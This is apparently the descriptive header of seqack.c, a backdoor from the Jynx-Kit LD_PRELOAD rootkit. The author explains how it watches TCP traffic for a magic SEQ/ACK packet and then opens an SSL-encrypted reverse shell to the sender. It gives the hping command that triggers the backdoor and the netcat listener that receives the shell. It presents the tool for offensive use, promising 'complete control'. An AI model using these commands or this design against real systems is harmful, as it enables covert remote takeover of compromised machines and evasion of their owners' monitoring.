seqack.c

SEQAck is an SSL encrypted, magic packet triggered reverse connect 
backdoor application. I wrote this as part of the original 
Jynx-Kit LD_PRELOAD rootkit, as we released on BlackHat Academy. With 
the second installation of the rootkit, we moved away from the stand 
alone sniffing reverse connect, and decided to hook accept() system 
call. Not only was it simply to demonstrate another example of creating 
a backdoor, but it also fit perfectly with what we were doing, 
backdooring the entire system.

This backdoor monitors on the given interface for all incoming TCP 
packets. It relies on two defines, MAGIC_SEQ and MAGIC_ACK. Once the 
magic packet is received, it initiates an SSL encrypted reverse 
connecting backdoor to the host that sent the packet, on the given 
source port. For example, we can initiate the reverse connect with the 
following hping command.

# hping -M 0xdead -L 0xbeef google.com -s 5000 -c 1

Notice, the source port is 5000, SEQ (-M) is 0xdead and ACK (-L) is 
0xbeef. With this example, we'd also need the following nc (netcat 
supplied with nmap) running in the background to accept the incoming 
connection.

# nc -l -p 5000 --ssl

And there you have it, the reverse connect shell was successful, and 
you're in complete control. The idea of using SEQ/ACK values could be 
applied to a single packet port knock sequence as well, so this 
application could be easily tweaked, and expanded upon based on your 
current needs.



Links:
BHA: http://www.blackhatacademy.org
Jynx-Kit: http://www.blackhatacademy.org/security101/Jynx_Rootkit/2.0
ChokePoint: http://www.chokepoint.net

